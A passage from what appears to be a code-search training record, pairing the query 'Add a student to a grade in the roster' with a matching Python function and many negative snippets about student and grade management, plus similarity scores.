submission['solution']['filename']}\n else:\n suploaded = None\n else:\n suploaded = None\n \n \n \n return {\n \"display_name\": self.title,\n \"question\":self.question,\n \"uploaded\": uploaded,\n \"quploaded\":quploaded,\n \"suploaded\":suploaded,\n \"raw_answer\":self.raw_answer,\n \"raw_question\":self.raw_question,\n \"score\": self.score,\n \"weight\":self.weight,\n \"attempts\": self.attempts,\n \"max_attempts\": self.max_attempts,\n }", "def add_student():\n # import pdb; pdb.set_trace()\n if request.method == \"POST\":\n\n first = request.form.get('first_name')\n last = request.form.get('last_name')\n github = request.form.get('github')\n\n hackbright.make_new_student(first, last, github)\n\n html = render_template(\"added_student_confirmation.html\",\n first=first,\n last=last,\n github=github)\n\n return html", "def get_students(self):\n self.cur = self.conn.cursor(pymysql.cursors.DictCursor)\n self.cur.execute(\"SELECT * FROM studenten\")\n self.cur.close()\n\n return self.cur.fetchall()", "def get_edu_fields():\n edu_hs_men_fields = [\n 'B15002_003E', #\tMale:!!No schooling completed\t\n 'B15002_004E', #\tMale:!!Nursery to 4th grade\t\n 'B15002_005E', #\tMale:!!5th and 6th grade\t\n 'B15002_006E', #\tMale:!!7th and 8th grade\t\n 'B15002_007E', #\tMale:!!9th grade\t\n 'B15002_008E', #\tMale:!!10th grade\t\n 'B15002_009E', #\tMale:!!11th grade\t\n 'B15002_010E', #\tMale:!!12th grade, no diploma\t\n 'B15002_011E', #\tMale:!!High school graduate (includes equivalency)\n ]\n edu_hs_women_fields = [\n 'B15002_020E', #\tFemale:!!No schooling completed\t\n 'B15002_021E', #\tFemale:!!Nursery to 4th grade\t\n 'B15002_022E', #\tFemale:!!5th and 6th grade\t\n 'B15002_023E', #\tFemale:!!7th and 8th grade\t\n 'B15002_024E', #\tFemale:!!9th grade\t\n 'B15002_025E', #\tFemale:!!10th grade\t\n 'B15002_026E', #\tFemale:!!11th grade\t\n 
'B15002_027E', #\tFemale:!!12th grade, no diploma\t\n 'B15002_028E', #\tFemale:!!High school graduate (includes equivalency)\t\n ]\n edu_some_college_men_fields = [\n 'B15002_012E', #\tMale:!!Some college, less than 1 year\t\n 'B15002_013E', #\tMale:!!Some college, 1 or more years, no degree\t\n 'B15002_014E', #\tMale:!!Associate's degree\t\n ]\n edu_some_college_women_fields = [\n 'B15002_029E', #\tFemale:!!Some college, less than 1 year\t\n 'B15002_030E', #\tFemale:!!Some college, 1 or more years, no degree\t\n 'B15002_031E', #\tFemale:!!Associate's degree\n ]\n edu_college_men_fields = [\n 'B15002_015E', #\tMale:!!Bachelor's degree\n ]\n edu_college_women_fields = [\n 'B15002_032E', #\tFemale:!!Bachelor's degree\n ]\n edu_postgrad_men_fields = [\n 'B15002_016E', #\tMale:!!Master's degree\n 'B15002_018E', #\tMale:!!Doctorate degree\n ]\n edu_postgrad_women_fields = [\n 'B15002_033E', #\tFemale:!!Master's degree\n 'B15002_035E', #\tFemale:!!Doctorate degree\t\n ]\n\n edu_fields = OrderedDict()\n\n return edu_fields", "def see_course_students(self, username: str, token: str, course_abbreviation: str) -> List[Tuple[str, float]]:\n\n # Validate user first\n if not self.validate(username=username, token=token, check_privilege='instructor'):\n raise RuntimeError(\"User not verified!\")\n\n # Get a DB cursor\n cursor = self._db_connection.cursor()\n\n # Get the course ID from the abbreviation\n cursor.execute('''\n SELECT course_id FROM courses WHERE course_abbreviation LIKE ?;\n ''', (course_abbreviation,))\n db_result = cursor.fetchone()\n\n # If no associated courses are found\n if db_result is None:\n RuntimeError(f\"Could not find course associated with: {course_abbreviation}\")\n\n # Extract the course ID from the returned tuple\n course_id = db_result[0]\n\n # Query database for all courses\n cursor.execute(\n '''\n SELECT \n uid,\n grade\n FROM \n enrollment_records\n WHERE\n course_id = ?\n ;\n ''', (course_id,))\n db_results = cursor.fetchall()\n\n # If no courses are available\n if db_results is None or len(db_results) == 0:\n return []\n\n # Build information dicts for every student enrolled in this course\n students = []\n for result in db_results:\n # Get the student's username (we don't want to be giving UIDs)\n student_name = self.get_username(result[0])\n\n # Build a course dict from the data\n students.append({\n \"name\": student_name,\n \"grade\": float(result[1])\n })\n\n # Return list of student info dictionaries\n return students", "def getGrades(self,student):\n try:\n return self.grades[student.getIdNum()][:]\n except KeyError:\n raise ValueError('Student not in grade book')", "def get_student_info(file, **kwargs):\n go = True\n storage = []\n for key, value in kwargs.items():\n storage.append(\"%s = %s\" % (key, value))\n score = '0'\n while go:\n score = input('Enter test score, or -1 to finish')\n if score.isdigit() and 0 <= int(score) <= 100:\n storage.append(score)\n elif score == '-1':\n go = False\n else:\n print('invalid input')\n write_to_file(str(storage) + '\\n', file)", "def add_students_to_table(students):\n for student_name, points in students.items():\n try:\n Student.create(username=student_name, points=points)\n except IntegrityError: # IntError occurs when username already exists\n student_record = Student.get(username=student_name)\n if student_record.points != points:\n student_record.points = points\n student_record.save()", "def add_row(self, student_id):\r\n self._current_row = {}\r\n yield self._add_grade_to_row\r\n self.grades[student_id] = 
self._current_row", "def AddStudent(self, student_name):\n self.__data['s'].AddItems([Student(self.__data['s'].GetSafeKey(), student_name)])\n self.__undo_list.append(['s'])\n self.__redo_list.clear()", "def all_students(self):\n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Student(\n row[1], row[2], row[3], row[5]\n )\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.StudentId,\n s.FirstName,\n s.LastName,\n s.SlackHandle,\n s.CohortId,\n c.Name\n from Student s\n join Cohort c on s.CohortId = c.CohortId\n order by s.CohortId\n \"\"\")\n\n all_students = db_cursor.fetchall()\n for student in all_students:\n print(student)", "def getGrades(self, student):\n try: #return copy of list of student's grades\"\"\"\n return self.grades[student.getIdNum()][:]\n except:\n raise ValueError('Student not in mapping')", "def student(self):\n if \"student\" in self._prop_dict:\n if isinstance(self._prop_dict[\"student\"], OneDriveObjectBase):\n return self._prop_dict[\"student\"]\n else :\n self._prop_dict[\"student\"] = EducationStudent(self._prop_dict[\"student\"])\n return self._prop_dict[\"student\"]\n\n return None", "def assign_grade(github, title, grade):\n QUERY = \"\"\"\n INSERT INTO Grades VALUES (?, ?, ?)\n \"\"\"\n\n db_cursor.execute(QUERY, (github, title, grade))\n db_connection.commit()\n\n print \"Successfully graded %s with a %s on %s\" % (github, grade, title)", "def get_student_profile(request):\n profile = get_profile_of_current_user()\n\n response = profile.json_data()\n response['is_student'] = True\n response['is_grad_student'] = is_grad_student()\n\n campuses = get_main_campus(request)\n if 'Seattle' in campuses:\n response['campus'] = 'Seattle'\n elif 'Tacoma' in campuses:\n response['campus'] = 'Tacoma'\n elif 'Bothell' in campuses:\n response['campus'] = 'Bothell'\n\n get_academic_info(request, response)\n\n return response", "def make_new_student(first_name, last_name, github):\n\n QUERY = \"\"\"INSERT INTO Students VALUES (?, ?, ?)\"\"\"\n # Query...all caps as a constant here, a string that will not change, (and only in the scope of this function!)\n db_cursor.execute(QUERY, (first_name, last_name, github))\n db_connection.commit()\n print \"Successfully added student: %s %s\" % (first_name, last_name)", "def make_new_student(first_name, last_name, github):\n QUERY = \"\"\"\n INSERT INTO Students VALUES(?, ?, ?)\"\"\"\n \n db_cursor.execute(QUERY, (first_name, last_name, github))\n db_connection.commit()\n print \"Successfully added student: %s %s\" % (first_name, last_name)", "def __init__(self, student):\n pass", "def __statistics_best_situation(self):\n students_list = self.__grade_controller.get_list_of_students_with_best_situation()\n if len(students_list) == 0:\n print(\"There is no student with a grade!\")\n return\n\n for student in students_list:\n print(str(student) + \"\\n\")", "def assigned_exercises(self):\n\n exercises = dict()\n\n with sqlite3.connect(self.db_path) as conn:\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select\n e.id ExerciseId,\n e.name,\n s.id,\n s.first_name,\n s.last_name\n from exercises e\n join student_exercises se on se.exercise_id = e.id\n join students s on s.id = se.student_id\n \"\"\")\n\n dataset = db_cursor.fetchall()\n\n for row in dataset:\n exercise_id = row[0]\n exercise_name = row[1]\n student_id = row[2]\n student_name = f'{row[3]} {row[4]}'\n \n if exercise_name not in exercises:\n exercises[exercise_name] = [student_name]\n # {\"Kennel\": [\"Brian 
Cravens\"]}\n else:\n exercises[exercise_name].append(student_name)\n # {\"Kennel\": [\"Brian Cravens\", \"Joe Montana\"]}\n for exercise_name, students in exercises.items():\n print(f'\\n{exercise_name}')\n for student in students:\n print(f'\\t* {student}')" ]
[ "0.70357305", "0.61918634", "0.6180321", "0.61655444", "0.61187875", "0.6078942", "0.6064046", "0.60455054", "0.60356414", "0.60095865", "0.59675676", "0.5928267", "0.5887183", "0.5879371", "0.5865206", "0.58481586", "0.58402777", "0.5822257", "0.5813019", "0.5812019", "0.58046603", "0.57986885", "0.5746263", "0.57218164", "0.57161504", "0.5708563", "0.5705498", "0.56950647", "0.56697726", "0.56639487", "0.5649606", "0.56440717", "0.5642649", "0.56377363", "0.5637059", "0.5634346", "0.56308717", "0.5620484", "0.5619968", "0.56194586", "0.5599918", "0.5596617", "0.5592885", "0.556101", "0.5534483", "0.55342686", "0.5532193", "0.552874", "0.5508508", "0.5492877", "0.54916286", "0.546077", "0.5454642", "0.54385823", "0.5436304", "0.54208994", "0.5418505", "0.5392792", "0.53834635", "0.538102", "0.5374693", "0.53691494", "0.5364897", "0.5364422", "0.53624284", "0.53586096", "0.5336416", "0.5328303", "0.5318989", "0.5316332", "0.5316249", "0.53137326", "0.5313641", "0.52953255", "0.528232", "0.52749264", "0.5271072", "0.5270799", "0.52578366", "0.5251188", "0.5248921", "0.52460194", "0.5239634", "0.5234603", "0.52341056", "0.5219074", "0.52150875", "0.52149475", "0.5213653", "0.52074623", "0.51696426", "0.5168701", "0.5163406", "0.51627105", "0.51600415", "0.515605", "0.5147448", "0.5145128", "0.51384073", "0.5127858" ]
0.6250706
1
Add a student to a grade in the roster.
def add_student(self, name: str, grade: int) -> None:\n school_grade = self.students.setdefault(grade, [])\n school_grade.append(name)\n school_grade.sort()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def add_grade(self, student, grade):\n try:\n self.grades[student.id].append(grade)\n except KeyError:\n raise ValueError('Student not in Grade Book.')", "def addGrade(self, student, grade):\n try:\n self.grades[student.getIDNumber()].append(grade)\n except KeyError:\n raise ValueError(\"Student not in Gradebook\")", "def add_student(self, student):\n if student in self.students:\n raise ValueError('Duplicate Student.')\n self.students.append(student)\n self.grades[student.id] = []\n self.is_sorted = False", "def addStudent(self, student):\n if student in self.students:\n raise ValueError(\"Duplicate Student\")\n self.students.append(student)\n self.grades[student.getIDNumber()] = []\n self.isSorted = False", "def add_student():\n\n\tprint('You must enter the student as is:\\n'\n\t\t\"'First name', 'middle name', 'Last name', 'major', 'major', 'gpa', id_number, 'minor'\"\n\t\t\" 'minor' graduation year, advisor number\\n For example: 'Kyle', 'Jacob', 'Ranney', 'Insurance'\"\n\t\t\", 'Chemistry', 3.0, 93988, 'Biology', 'NULL', 2016, 2234\\n\")\n\t# use sql insert statement\n\t# become familiar with this!\t", "def AddGrade(self, student, discipline, grade_value):\n if not self.__data['s'].HasKey(student.ID):\n raise NonExistentItemIDError(\"Student does not exist.\")\n if not self.__data['d'].HasKey(discipline.ID):\n raise NonExistentItemIDError(\"Discipline does not exist.\")\n self.__data['g'].AddItems([Grade(self.__data['g'].GetSafeKey(), student.ID, discipline.ID, grade_value)])\n self.__undo_list.append(['g'])\n self.__redo_list.clear()", "def AddStudent(self, event):\n pass", "def add_student(self, student: 'Student') -> None:\n # Add HOUSEHOLD attributes to the schools' composition\n self.total += 1\n self.composition += student.household.attributes\n self.students[student.idx] = student\n self.has_space = (self.total < self.capacity)", "def AddStudent(self, student_name):\n self.__data['s'].AddItems([Student(self.__data['s'].GetSafeKey(), student_name)])\n self.__undo_list.append(['s'])\n self.__redo_list.clear()", "def add_student(body): # noqa: E501\n if connexion.request.is_json:\n body = Student.from_dict(connexion.request.get_json()) # noqa: E501\n return student_service.add_student(student=body)", "def addStud(self,ID,name,attNr,grade):\n if ID < 0: raise Exception(\"Invalid ID!\")\n parts = name.split(' ')\n if len(parts) < 2: raise Exception('Invalid name!')\n for part in parts:\n if len(part)<3: raise Exception('Invalid name!')\n if attNr < 0: raise Exception('Invalid number of attendances!')\n if grade not in range(0,11): raise Exception('Invalid grade!')\n self.__studRepo.add(Student(ID,name,attNr,grade))", "def add_student(user_inputs):\r\n no_space = (remove_space(user_inputs))\r\n student_tuple = student_info._make(no_space.split(\",\"))\r\n StudentRoster.append(student_tuple)", "def __ui_grade_student(self):\n student_id = input(\"Give student ID: \")\n discipline_name = input(\"Give discipline discipline_name: \")\n\n try:\n grade_value = input(\"Give grade: \")\n if not self.__student_controller.student_has_discipline(student_id, discipline_name):\n print(\"The student isn't enrolled at the given discipline!\")\n return\n self.__grade_controller.add_grade(\n student_id,\n self.__discipline_controller.get_id_by_name(discipline_name),\n grade_value\n )\n print(\"Grade successful! 
\\n\")\n\n except GradeException as ge:\n print(ge)\n return\n except StudentException as se:\n print(se)\n return\n except RepositoryException as re:\n print(re)\n return\n except ValueError as ve:\n print(ve)\n return", "def addStudent():\n name = input(\"Name: \")\n number = input(\"Number: \")\n gpa = input(\"GPA: \")\n field = input(\"Field: \")\n student = Student(name, number, gpa, field)\n if t.insert(number, student):\n ht.insert(student)\n print(name, \"added successfully.\")\n else:\n print(\"student number is not valid.\")", "def test_add_student():\n classroom = setup_for_test()\n student = Student(\"Andrew Tsukuda\")\n classroom.add_student(student)\n assert len(classroom.student_dir) == 1\n assert classroom.student_dir[0].ID == 1", "def add_course_grade(self, course, grade):\n course_grade_tuple = (course, grade)\n self.courses_grades.append(course_grade_tuple)", "def add_student(body): # noqa: E501\n if connexion.request.is_json:\n student = Student.from_dict(connexion.request.get_json()) # noqa: E501\n # print(student)\n result = student_service.add_student(student)\n return result\n\n return 'input no bueono', 400", "def assign_grade(github, title, grade):\n QUERY = \"\"\"\n INSERT INTO Grades VALUES (?, ?, ?)\n \"\"\"\n\n db_cursor.execute(QUERY, (github, title, grade))\n db_connection.commit()\n\n print \"Successfully graded %s with a %s on %s\" % (github, grade, title)", "def add_student():\n if request.method == 'POST':\n db.add_student(request.form)\n return redirect('/registry')\n else:\n return render_template('add.html')", "def insert_grade(grade, form, rc):\n dbname = form[\"dbname\"]\n collname = \"grades\"\n try:\n coll = rc.client[dbname][collname]\n except (KeyError, AttributeError):\n abort(404)\n try:\n added = rc.client.insert_one(dbname, collname, grade)\n except Exception:\n traceback.print_exc()\n raise", "def _save_grade(self):\r\n student = self._student('POST', key='grader_id')\r\n if student is None:\r\n self._error_response()\r\n\r\n else:\r\n # Update the number of essays the student has graded\r\n student.grade_peer_essay()\r\n return self._success_response({})", "def createStudent(self):\n self.createProfile()\n from soc.modules.gsoc.models.profile import GSoCStudentInfo\n properties = {'key_name': self.profile.key().name(), 'parent': self.profile}\n self.profile.student_info = seeder_logic.seed(GSoCStudentInfo, properties)\n self.profile.put()", "def add_student():\n # import pdb; pdb.set_trace()\n if request.method == \"POST\":\n\n first = request.form.get('first_name')\n last = request.form.get('last_name')\n github = request.form.get('github')\n\n hackbright.make_new_student(first, last, github)\n\n html = render_template(\"added_student_confirmation.html\",\n first=first,\n last=last,\n github=github)\n\n return html", "def assign_grade(github, title, grade):\n QUERY = \"\"\"INSERT INTO Grades VALUES(?,?,?)\"\"\"\n db_cursor.execute(QUERY, (github, title, grade))\n db_connection.commit()\n print \"Success! 
%s received a grade of %s on the %s project!\" % (github, grade, title)", "def update_grade(self, course, grade):\n if course not in self.courses:\n raise NameError('This student is not enrolled in that course')\n else:\n self.courses[course] = grade\n\n return self", "def enroll_student(self, student_email):\n # check if course exists\n if not self.is_course_exists():\n print(\"The given course not found\")\n return\n\n if self.is_student_enrolled(student_email):\n print(\"The course is not exists or/ and student {} is already enrolled\".format(student_email))\n return\n else:\n db = self._file.read_db()\n for crs_i in range(len(db[\"courses\"])):\n if db[\"courses\"][crs_i][\"course_name\"] == self._course_name:\n db[\"courses\"][crs_i][\"students\"].append(student_email)\n break\n self._file.write_db(db)\n print(\"The new student is enrolled to course: {}\".format(self._course_name))", "def _add_grade_to_row(self, component, score):\r\n component_index = self.components.setdefault(component, len(self.components))\r\n self._current_row[component_index] = score", "def added_student():\n\n first = request.form.get('first_name')\n last = request.form.get('last_name')\n github = request.form.get('github')\n\n hackbright.make_new_student(first, last, github)\n first, last, github = hackbright.get_student_by_github(github)\n\n html = render_template(\"student_added.html\", first=first, last=last, github=github)\n\n return html", "def add_row(self, student_id):\r\n self._current_row = {}\r\n yield self._add_grade_to_row\r\n self.grades[student_id] = self._current_row", "def copy_and_add_student(self, new_student, happiness, stress):\n new_room = Room(self.rm_id)\n new_room.students = frozenset(list(self.students) + [new_student])\n new_room.stress = self.stress + stress\n new_room.happiness = self.happiness + happiness\n return new_room", "def editStudent(s, number):\n nname = input(\"New Name: \")\n nnumber = input(\"New Number: \")\n ngpa = input(\"New GPA: \")\n nfield = input(\"New Field: \")\n\n deleteStudent(s, number)\n student = Student(nname, nnumber, ngpa, nfield)\n if t.insert(nnumber, student):\n ht.insert(student)\n print(nname, \"edited successfully.\")\n else:\n print(\"new student number is not valid.\")", "def add_student():\n\n return render_template(\"student_add.html\")", "def added_student():\n\n first = request.form.get('first')\n last = request.form.get('last')\n github = request.form.get('github')\n\n hackbright.make_new_student(first, last, github)\n\n return render_template(\"student_confirmed.html\",\n first=first,\n last=last,\n github=github)", "def add_student_data(connection,fname,lname,class_n,marks):\r\n with connection:\r\n connection.execute(INSERT_STUDENT,(fname,lname,class_n,marks))", "def add_grades(self, request, pk=None):\n\n instance = self.get_object()\n try:\n user = self.request.user\n query = models.StudentSubject.objects.filter(\n subject__teacher__user=user,\n subject=instance\n )\n serializer = self.get_serializer(query, many=True)\n \n id = self.request.query_params.get('id')\n\n if id:\n q = get_object_or_404(\n models.StudentSubject,\n pk=id,\n subject=instance\n )\n return self.filtering(request, q)\n return Response(serializer.data)\n except:\n raise except_handler.ActionDecor()", "def take_test(exam, student):\n\n student.score = exam.administer()", "def make_new_student(first_name, last_name, github):\n QUERY = \"\"\"INSERT INTO Students VALUES(?,?,?)\"\"\"\n db_cursor.execute(QUERY, (first_name, last_name, github))\n 
db_connection.commit()\n print \"Successfully added student: %s %s\" % (first_name, last_name)", "def post_student():\n\n first_name = request.form.get('first_name')\n last_name = request.form.get('last_name')\n github = request.form.get('github')\n\n hackbright.make_new_student(first_name, last_name, github)\n\n flash(\"Successfully added new student.\")\n\n return redirect(\"/student?github={}\".format(github))", "def set_grade(\n self,\n assignment_id,\n student_id,\n grade_value,\n gradebook_id='',\n **kwargs\n ):\n # pylint: disable=too-many-arguments\n\n # numericGradeValue stringified because 'x' is a possible\n # value for excused grades.\n grade_info = {\n 'studentId': student_id,\n 'assignmentId': assignment_id,\n 'mode': 2,\n 'comment': 'from MITx {0}'.format(time.ctime(time.time())),\n 'numericGradeValue': str(grade_value),\n 'isGradeApproved': False\n }\n grade_info.update(kwargs)\n log.info(\n \"student %s set_grade=%s for assignment %s\",\n student_id,\n grade_value,\n assignment_id)\n return self.post(\n 'grades/{gradebookId}'.format(\n gradebookId=gradebook_id or self.gradebook_id\n ),\n data=grade_info,\n )", "def make_new_student(first_name, last_name, github):\n QUERY = \"\"\"\n INSERT INTO Students VALUES(?, ?, ?)\"\"\"\n \n db_cursor.execute(QUERY, (first_name, last_name, github))\n db_connection.commit()\n print \"Successfully added student: %s %s\" % (first_name, last_name)", "def set_student(self, student_id):\n self._student = student_id", "def register_student(self, **fields):\n if 'student_key' not in fields.keys():\n raise KeyError('Primary key is missing')\n existing_fields = [i.name for i in self._db.get_columns('students')]\n needed_fields = {}\n for key, value in fields.items():\n if key in existing_fields:\n needed_fields[key] = value\n if 'UID' not in needed_fields.keys():\n needed_fields['UID'] = needed_fields['student_key']\n check = Students.get_or_none(student_key=needed_fields['student_key'])\n if check is not None:\n return check\n dummy_parent = Parents.get(parent_key=fields['parent']) if 'parent' in fields else Parents.get(parent_key='0')\n new_student = Students.get_or_create(parent=dummy_parent, **needed_fields)\n return new_student[0]", "def __ui_add_student(self):\n student_id = input(\"student_id: \")\n student_name = input(\"student_name: \")\n\n print(\"Give disciplines for student, enter for done\")\n disciplines_list = []\n\n discipline_name = '0'\n while discipline_name != '':\n discipline_name = input(\"Discipline discipline_name: \")\n if discipline_name == '':\n break\n elif self.__discipline_controller.find_by_name(discipline_name) is not None:\n disciplines_list.append(discipline_name)\n print(\"Add discipline successful\\n\")\n else:\n print(\"Invalid discipline!\")\n\n try:\n self.__student_controller.add_student(student_id, student_name, disciplines_list)\n print(\"Add student successful\\n\")\n except StudentException as se:\n print(se)\n return\n except RepositoryException as re:\n print(re)\n return", "def make_new_student(first_name, last_name, github):\n\n QUERY = \"\"\"INSERT INTO Students VALUES (?, ?, ?)\"\"\"\n # Query...all caps as a constant here, a string that will not change, (and only in the scope of this function!)\n db_cursor.execute(QUERY, (first_name, last_name, github))\n db_connection.commit()\n print \"Successfully added student: %s %s\" % (first_name, last_name)", "def addCourse(self):\n\t\tcourseName = input(\"What is the new course name? \")\n\t\tcourseGrade = eval(input(\"What grade point did you get? 
\"))\n\t\tself.courses.append(Course(courseName,courseGrade))\n\t\tself.gpa = self.calculateGPA()", "def _enroll_students_in_course(self, course_id, num_students):\r\n\r\n for _ in range(num_students):\r\n random_id = uuid4().hex[:8]\r\n self.create_student(username='student{0}'.format(random_id))", "def give_extra_credit(grades,netids,bonus):\n # No accumulator. This is a procedure\n \n for student in netids:\n if student in grades: # Test if student is a key in grades\n grades[student] = grades[student]+bonus", "def add_students() -> None:\r\n faculties = [\"Computer Science\", \"Performing Arts\", \"Engineering\", \"Economics\"]\r\n for faculty in faculties:\r\n for _ in range(50):\r\n create_student(faculty)", "def grade(student, request, course, keep_raw_scores=False):\r\n with manual_transaction():\r\n return _grade(student, request, course, keep_raw_scores)", "def register_student(request):\n email = auth.check_login(request)\n if email:\n db = database.Database()\n db.add_student(email, \"\", \"\")\n return True\n return False", "def add_instance_of_course(self, semester, professor, crn, status):\n self.semesters.append(semester)\n self.professors.append(professor)\n self.statuses.append(status)\n self.instances[crn] = (semester, professor, status)", "def add_recommendation(self, user_id, event_id, score):\r\n\r\n sql_command = \"\"\"\r\n INSERT INTO UserRecommendations(user_id, event_id, rating)\r\n VALUES ( ? , ? , ?);\r\n \"\"\"\r\n\r\n values = (user_id, event_id, score)\r\n self.controller.execute(sql_command, values)\r\n self.connection.commit()", "def createStudentWithProposal(self):\n self.createStudent()\n from soc.modules.gsoc.models.proposal import GSoCProposal\n properties = {'link_id': self.profile.link_id, 'scope': self.profile,\n 'parent': self.profile, 'status': 'new'}\n seeder_logic.seed(GSoCProposal, properties)", "def add(self, rank, birth_year, enlisting_year, shirt_color, name):\n # Your implementation here", "def edit_grade(self, username: str, token: str, course_abbreviation: str, student_id: str, updated_grade: float) -> bool:\n\n # Validate user first\n if not self.validate(username=username, token=token, check_privilege='instructor'):\n raise RuntimeError(\"User not verified!\")\n\n # Get the student's UID\n student_uid = self.get_uid(username=student_id)\n\n # Get a DB cursor\n cursor = self._db_connection.cursor()\n\n # Get the course ID from the abbreviation\n cursor.execute('''\n SELECT course_id FROM courses WHERE course_abbreviation LIKE ?;\n ''', (course_abbreviation,))\n db_result = cursor.fetchone()\n\n # If no associated courses are found\n if db_result is None:\n RuntimeError(f\"Could not find course associated with: {course_abbreviation}\")\n\n # Extract the course ID from the returned tuple\n course_id = db_result[0]\n\n # Run update in the DB\n cursor.execute('''\n UPDATE enrollment_records SET grade = ? WHERE uid = ? 
AND course_id = ?\n ''', (updated_grade, student_uid, course_id))\n self._db_connection.commit()\n\n return True", "def add_students_to_table(students):\n for student_name, points in students.items():\n try:\n Student.create(username=student_name, points=points)\n except IntegrityError: # IntError occurs when username already exists\n student_record = Student.get(username=student_name)\n if student_record.points != points:\n student_record.points = points\n student_record.save()", "def test01_add_new_student_with_admin(self):\n students_list_with_new_student = self.students_page.\\\n click_edit_students_list_button().\\\n click_add_new_student_button().\\\n enter_student_data(data['first_new_student']).\\\n click_save_data_changes_button().\\\n click_exit_students_list_editor_button().\\\n students_table()\n student = data_student_for_check(data['first_new_student'])\n self.assertEqual(self.main_page.get_current_url(),\n data['expected_url'])\n self.assertIn(student, students_list_with_new_student)", "def take_test(exam, student):\n\n student.score = exam.administer()\n return student.score", "def test14_add_new_student_with_teacher(self):\n students_list_with_new_student = self.students_page. \\\n click_edit_students_list_button(). \\\n click_add_new_student_button(). \\\n enter_student_data(data['third_new_student']).\\\n enter_name_approved_by_custom(data['third_new_student']). \\\n click_save_data_changes_button(). \\\n click_exit_students_list_editor_button(). \\\n students_table()\n student = data_student_for_check(data['third_new_student'])\n self.assertEqual(self.main_page.get_current_url(),\n data['expected_url'])\n self.assertIn(student, students_list_with_new_student)\n return self.students_page", "def set_grade(github, project_title, grade_value):\n \n QUERY = \"\"\"INSERT INTO Grades VALUES (?, ?, ?)\"\"\"\n \n db_cursor.execute(QUERY, (github, project_title, grade_value))\n db_connection.commit()\n\n \n # print \"%s %s's grade: %s\" % (first_name, last_name, grade)\n print \"Successfully graded %s on Project %s: %s\" % (github, project_title, grade_value)", "def add_student(lstudents, lnotes):\n option = 'y'\n\n while option == 'y':\n\n try:\n name = input('Name: ')\n qualification = float(input('Qualification: '))\n lstudents.append(name)\n lnotes.append(qualification)\n\n except ValueError:\n print('wrong value')\n\n option = input(\n 'if you want add more studets press: \\'y\\' otherwise press any key: ')", "def _grade_with_errors(student, request, course, keep_raw_scores=False):\r\n if student.username in ['student3', 'student4']:\r\n raise Exception(\"I don't like {}\".format(student.username))\r\n\r\n return grade(student, request, course, keep_raw_scores=keep_raw_scores)", "def option1(self):\n ID = int(input(\"ID: \"))\n name = input(\"Name: \")\n attNr = int(input(\"Number of attendances: \"))\n grade = int(input(\"Grade: \"))\n self.__srv.addStud(ID,name,attNr,grade)", "def add_book_to_user(self, book, email, rating=None):\n if self.users.get(email):\n self.users[email].read_book(book, rating)\n self.books[book] = self.books.get(book, 0) + 1\n if rating:\n book.add_rating(rating)\n else:\n print(\"{email} address not found.\".format(email=email))", "def student_grades(student, course):\n cg = CourseGradeFactory().create(student, course)\n return cg.summary", "def test09_add_new_student_with_coordinator(self):\n students_list_with_new_student = self.students_page. \\\n click_edit_students_list_button(). \\\n click_add_new_student_button(). 
\\\n enter_student_data(data['second_new_student']). \\\n click_save_data_changes_button(). \\\n click_exit_students_list_editor_button(). \\\n students_table()\n student = data_student_for_check(data['second_new_student'])\n self.assertEqual(self.main_page.get_current_url(),\n data['expected_url'])\n self.assertIn(student, students_list_with_new_student)", "def create_student(conn, student, first_name, last_name, major, start_date):\n sql = ''' INSERT INTO student(firstname, lastname, major, start_date)\n VALUES(?,?,?,?) '''\n cur = conn.cursor() # cursor object\n cur.execute(sql, student)\n # return cur.lastrowid # returns the row id of the cursor object, the student id\n first_name.set('')\n last_name.set('')\n major.set('')\n start_date.set('')\n messagebox.showinfo('Success', 'Student Successfully Added to the Database!')", "def add_score(self, score):\n self._score += score", "def on_add_clicked(self):\n selected_indexes = self.ui.availListView.selectedIndexes()\n for index in selected_indexes:\n row = self.availModel.itemFromIndex(index).row()\n #rowList = self.availModel.takeRow(row)\n student = self.availModel.item(row, 0).text()\n sid = self.availModel.item(row, 1).text()\n try:\n # Actually add the student for the date into the database\n self.db.student_attend(sid, self.date_string)\n except KeyError:\n # Display error window if student missing\n err_msg = QtGui.QErrorMessage()\n err_msg.showMessage(\"Sid not found for student %s\" % student)\n\n self.update_views()", "def add_score(self, player, level, score):\n cursor = self._connection.cursor()\n command = 'INSERT INTO scores (player, level, score) VALUES (?, ?, ?)'\n cursor.execute(command, [player, level, score])\n self._connection.commit()", "def add_grades(self, subject_name, grade_list, attendance=True): \n\t\n\t\tif (isinstance(subject_name, str) and isinstance(grade_list, list)):\n\t\t\tfor grade in grade_list:\n\t\t\t\tself.grades.setdefault(subject_name, []).append(grade)\n\t\t\tself.attendance += 1 if attendance else 0", "def __init__(self, name, skill):\n \n super(Student, self).__init__(name)\n self.grades = []\n self.skill = skill", "def add_student():\r\n reply = True\r\n while reply is True:\r\n reply = yes_or_no('Do you want to add a student?')\r\n if reply is True:\r\n student_name = input('Enter student name: ') or \"-1\"\r\n student_id = input('Enter student id: ') or \"-1\"\r\n student = {\"name\": student_name, \"student_id\": student_id}\r\n students.append(student)\r\n save_file(student_name)", "def add_to_score(self, to_add):\n self.score += to_add", "def enroll_students(self, student_emails, nid=None):\n if self.cookies is None:\n raise NotAuthenticatedError(\"You must authenticate before making any other requests.\")\n\n nid = nid if nid else self._nid\n\n content_url = self.base_api_url\n content_params = {\"method\": \"network.update\"}\n content_data = {\n \"method\": \"network.update\",\n \"params\": {\n \"id\": nid,\n \"from\": \"ClassSettingsPage\",\n \"add_students\": student_emails\n }\n }\n\n r = requests.post(\n content_url,\n data=json.dumps(content_data),\n params=content_params,\n cookies=self.cookies\n ).json()\n\n if r.get(u'error'):\n raise Exception(\"Could not add users.\\n{}\".format(r))\n else:\n return r.get(u'result')", "def addStudent(request):\n\temp = models.Teacher.objects.get(user=request.user)\n\tif not emp.student_permit:\n\t\traise Http404\n\tcontext_dict = {\n\t\t\"all_courses\": context_helper.course_helper(),\n\t\t\"blood_groups\": 
